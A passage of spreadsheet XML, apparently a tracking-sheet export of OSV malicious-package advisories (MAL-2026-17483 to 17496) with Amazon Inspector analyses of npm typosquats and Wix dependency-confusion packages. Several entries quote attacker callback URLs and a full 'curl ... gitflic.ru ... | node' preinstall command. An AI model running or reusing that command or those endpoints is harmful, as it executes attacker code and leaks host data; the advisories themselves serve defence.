      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr"/>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3b18e313d5fc67f07c1bcf051bd79a85dca97bb3c4510d9755efca6414bb55ff)
The package is published as css-reading-flow-polyfill but ships thunderboltRegistry.js, which impersonates internal Wix thunderbolt registry modules (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) by exporting all of those names from a single payload file. On require, an IIFE in thunderboltRegistry.js uses child_process.execSync to run id, whoami, uname, ifconfig/ip-addr and read /etc/hosts, then fetches http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plain HTTP with the command output, hostname, Node version, platform and pid appended as query parameters. The module also walks require.cache and deletes any entry whose key contains 'thunderboltRegistry' so the recon-and-exfil IIFE re-runs on every require rather than being cached. index.js is an empty decoy; the stated CSS polyfill purpose is a cover story and the package has no implementation of that functionality.
</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17483</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17484</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr"/>
      <c r="F18" s="5" t="inlineStr"/>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>npm:css-relative-color-util</t>
        </is>
      </c>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr"/>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ee0efef48c7d56201a037b237f11ec712853f86e74f6a00ef8011732b31363f1)
The package name advertises a CSS utility, but thunderboltRegistry.js runs an IIFE on module load that uses child_process.execSync to execute whoami, uname -a, cat /etc/hosts, and ifconfig/ip addr, then exfiltrates the output together with os.hostname and the Node version to a hardcoded webhook at https://dxpoc.gt.tc/callback.php/ via fetch and to an *.oast.live DNS collector via dns.resolve. The loader deletes any require.cache entry containing 'thunderboltRegistry' so the IIFE re-fires on subsequent requires, and falls back to node:child_process and new module.constructor().require('child_process') to obtain the exec primitive. The package also exports stubs named thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry and similar, matching internal Wix thunderbolt module names, with a registry-manifest.min.json pointing at static.parastorage.com unpkg paths — a dependency-confusion shape targeting an internal namespace. The declared CSS-utility purpose is unrelated to any of this behavior.
</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17484</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17485</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr"/>
      <c r="F19" s="5" t="inlineStr"/>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>npm:css-scroll-anchor-polyfill</t>
        </is>
      </c>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr"/>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (36596ba9b9d8c0f994abe3cd87783f4f0dc880e63d55374d3555347ce349fab2)
Package is published as css-scroll-anchor-polyfill but its index.js is empty and its contents impersonate internal Wix thunderbolt registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) with a shipped registry-manifest.min.json mapping them to parastorage.com URLs. The declared purpose (a CSS scroll-anchor polyfill) is unrelated to the shipped code. thunderboltRegistry.js contains a top-level IIFE that executes on require: it runs local reconnaissance via child_process.execSync (cat /etc/hosts, whoami, id, pwd, ifconfig/ip addr, hostname, uname -a) and transmits the collected output together with a beacon (node version, process.platform, pid) via fetch to a hardcoded HTTP endpoint at http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. Any internal build that resolves one of the impersonated thunderbolt names to this public package and requires the corresponding submodule triggers the reconnaissance and exfiltration path.
</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17485</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17486</t>
        </is>
      </c>
      <c r="D20" s="5" t="inlineStr"/>
      <c r="E20" s="5" t="inlineStr"/>
      <c r="F20" s="5" t="inlineStr"/>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>npm:css-scroll-state-polyfill</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr"/>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cffa0affc34bac3fa24fcc7c67aae4d120066f4f856cb8b637bc04c6ca9d482c)
The package presents itself as a CSS polyfill but ships a payload file (thunderboltRegistry.js) that executes an IIFE at require time. The IIFE uses child_process to run host-identification commands (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts, hostname) and collects Node version, platform, and PID, then sends the captured data via fetch to a hardcoded webhook.site collector at https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba. The main index.js is an empty stub; filenames mimic internal Wix Thunderbolt registry modules, consistent with a dependency-confusion squat targeting that namespace. A self-identifying 'beacon=poc15' tag is included in the request. The payload also walks require.cache and deletes any entry whose key contains 'thunderboltRegistry', causing subsequent requires in the same process to re-execute the recon-and-exfiltration path rather than return a cached export, and exports a Proxy that answers arbitrary method accesses to blend in with the impersonated registry.
</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17486</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17487</t>
        </is>
      </c>
      <c r="D21" s="5" t="inlineStr"/>
      <c r="E21" s="5" t="inlineStr"/>
      <c r="F21" s="5" t="inlineStr"/>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>npm:css-snap-target-polyfill</t>
        </is>
      </c>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr"/>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (00c104d427125b4acf88ecb83a58d563507b23bcb716cb87fbf7fc953d816d42)
The package ships thunderboltRegistry.js, which uses child_process and process.platform to collect host information and POSTs it via fetch() to the hardcoded external endpoint http://dxpoc.gt.tc. The destination is unrelated to any CSS polyfill functionality the package name advertises, is served over cleartext HTTP, and is not caller-configurable. This behavior does not correspond to the declared purpose of a CSS snap-target polyfill, which has no legitimate need to execute shell commands or beacon host details to a third-party domain.
</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17487</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17488</t>
        </is>
      </c>
      <c r="D22" s="5" t="inlineStr"/>
      <c r="E22" s="5" t="inlineStr"/>
      <c r="F22" s="5" t="inlineStr"/>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>npm:css-starting-style-polyfill</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr"/>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (713c302594ab7c41e8034ca95478045afafba98e223ea62def160f080cb879cd)
thunderboltRegistry.js runs an IIFE on module load that executes host reconnaissance commands via child_process.execSync (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) and transmits the collected output together with hostname, platform, and pid to a hardcoded external URL https://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f via fetch. The package exports factories under names matching Wix internal registry modules (thunderboltRegistry, corvidRegistry, siteAssetsRegistry, editorRegistry, documentManagementRegistry) and ships a manifest referencing parastorage.com URLs, so any environment loading it as a drop-in Wix thunderbolt registry triggers the exfiltration payload on require(). The declared CSS @starting-style polyfill purpose has no relationship to the shipped behavior.
</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17488</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17489</t>
        </is>
      </c>
      <c r="D23" s="5" t="inlineStr"/>
      <c r="E23" s="5" t="inlineStr"/>
      <c r="F23" s="5" t="inlineStr"/>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>npm:express-enhanced</t>
        </is>
      </c>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr"/>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (15d6ce3e4c988439e6023bb900fde41c1a7eebe0c372eddc3a3c3c9d8206a9d6)
express-enhanced@5.2.2 impersonates the express package: it ships the express README verbatim, declares `TJ Holowaychuk` as author, and points `repository` at `expressjs/express`, while publishing under a different name. The package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading an unpinned JavaScript payload from a gitflic.ru account unrelated to the express maintainers (wrapped through web.archive.org) and piping it directly to node at `npm install` time. The fetched content is not integrity-checked, the source is mutable and attacker-controlled, and execution happens automatically on install, giving the publisher arbitrary code execution on any machine that installs the package.
</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17489</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17490</t>
        </is>
      </c>
      <c r="D24" s="5" t="inlineStr"/>
      <c r="E24" s="5" t="inlineStr"/>
      <c r="F24" s="5" t="inlineStr"/>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>npm:express-fork</t>
        </is>
      </c>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr"/>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (174daf2d7b9b396bb40a2ad347597eb7d1e829c46e4568e9700302e8aaceee3d)
express-fork@5.2.2 is a typosquat of the express package. Its package.json metadata (description, author, repository, keywords) is copied verbatim from express, while package.json line 98 defines a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/...?file=node.js | node`. On every `npm install`, the hook fetches an unpinned JavaScript file from a third-party gitflic.ru account unrelated to the Express publisher (via a web.archive.org wrapper) and pipes it directly to the Node interpreter, with no integrity or signature check. The fetched content executes with the privileges of the installing user and can perform arbitrary actions on the installer's machine, including credential theft, persistence, or further payload delivery. The impersonation of express is the lure that causes typo-based installs to trigger the remote-exec hook.
</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17490</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17491</t>
        </is>
      </c>
      <c r="D25" s="5" t="inlineStr"/>
      <c r="E25" s="5" t="inlineStr"/>
      <c r="F25" s="5" t="inlineStr"/>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>npm:focus-visible-polyfill-lite</t>
        </is>
      </c>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr"/>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5225b5a8636a589f9b90272ad04c3f4104670a23d5c24b45f6aeaa757a4f2a2b)
The package is advertised as a focus-visible polyfill but ships thunderboltRegistry.js, which impersonates Wix thunderbolt internal registry modules (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) via a Proxy-backed export stub. When the module is required, an IIFE at the top of the file uses child_process.execSync to run host reconnaissance commands (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) and sends the command output along with a beacon (Node version, platform, pid) via plain-HTTP GET requests to a hardcoded attacker-controlled endpoint at http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package self-labels the beacon as 'rce-poc'. The shape is a dependency-confusion / typosquat payload: a benign-sounding public package shadows Wix-internal registry names so that a build pipeline resolving these names from the public registry executes the reconnaissance payload with the installer's privileges on module load.
</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17491</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17492</t>
        </is>
      </c>
      <c r="D26" s="5" t="inlineStr"/>
      <c r="E26" s="5" t="inlineStr"/>
      <c r="F26" s="5" t="inlineStr"/>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>npm:@angularr/cli</t>
        </is>
      </c>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr"/>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (122d8c8fdbfe9bd590dd3e1c41a6afcefff4f1c552af5f1756577975c84878a8)
Package is published as @angularr/cli (double 'r') and copies @angular/cli's description, keywords, homepage, repository URL, README, and version string (22.2.1) to impersonate Angular's official CLI. package.json declares a preinstall lifecycle hook that pipes a remote JavaScript file into node: `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`. The fetched script is hosted on gitflic.ru (user 'hellscripter', unrelated to Angular's publisher), proxied through web.archive.org, is unpinned, has no integrity check, and is executed directly by the installer's node process. Any `npm install @angularr/cli` performs arbitrary code execution on the installer's host under the account running npm. src/analytics/analytics-collector.js additionally issues outbound ping/POST traffic via https.request carrying host identifiers.
</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17492</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17493</t>
        </is>
      </c>
      <c r="D27" s="5" t="inlineStr"/>
      <c r="E27" s="5" t="inlineStr"/>
      <c r="F27" s="5" t="inlineStr"/>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>npm:@angularr/core</t>
        </is>
      </c>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr"/>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (801dcd769bdbf58aa11a657a5344e075ed57fcdafd1384b47ba611956e7cb365)
The package's npm preinstall lifecycle script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching a JavaScript payload from a third-party host and piping it directly to node for execution on every `npm install`. The destination (gitflic.ru under a user path `hellscripter/install-scripts`, routed via a web.archive.org proxy) is unrelated to any `@angular` publisher infrastructure, is unpinned, and is not integrity-checked. Whoever controls that path controls code execution on the installer's host. The package name `@angularr/core` is a one-letter variant of the widely-used `@angular/core`, increasing the likelihood of accidental installation.
</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17493</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17494</t>
        </is>
      </c>
      <c r="D28" s="5" t="inlineStr"/>
      <c r="E28" s="5" t="inlineStr"/>
      <c r="F28" s="5" t="inlineStr"/>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>npm:@angularr/router</t>
        </is>
      </c>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr"/>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (646c9fd4e8d09651eb6d5ec997e6d1b62f294d39d52ec3b4143853c922f15e83)
The package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from a third-party repository (gitflic.ru user `hellscripter`, proxied via web.archive.org) and piping it directly into Node for execution during `npm install`. The code executes with the installer's privileges before any package code is loaded. The package name `@angularr/router` (double-r) resembles `@angular/router`, while the shipped library code is a verbatim copy of pillarjs/router (unrelated to Angular) that serves as cover for the malicious lifecycle hook.
</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17494</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17495</t>
        </is>
      </c>
      <c r="D29" s="5" t="inlineStr"/>
      <c r="E29" s="5" t="inlineStr"/>
      <c r="F29" s="5" t="inlineStr"/>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>npm:@angulra/cli</t>
        </is>
      </c>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr"/>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f)
The package name @angulra/cli is a character-swap of @angular/cli and copies the legitimate Angular CLI's metadata (description, repository, homepage, keywords, dependencies). Its package.json defines a preinstall script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from an anonymous third-party account (hellscripter) on gitflic.ru via a web.archive.org proxy and piping the response directly into Node. The URL is unpinned, has no integrity check, is unrelated to the Angular publisher, and the fetched bytes execute automatically on `npm install`, giving the operator of that endpoint arbitrary code execution on the installer's machine. src/analytics/analytics-collector.js additionally issues outbound POSTs via https.request alongside ping-style activity.
</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17495</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17496</t>
        </is>
      </c>
      <c r="D30" s="5" t="inlineStr"/>
      <c r="E30" s="5" t="inlineStr"/>
      <c r="F30" s="5" t="inlineStr"/>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>npm:@angulra/core</t>
        </is>
      </c>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr"/>
      <c r="S30" s="5" t="inlineStr">
        <is>
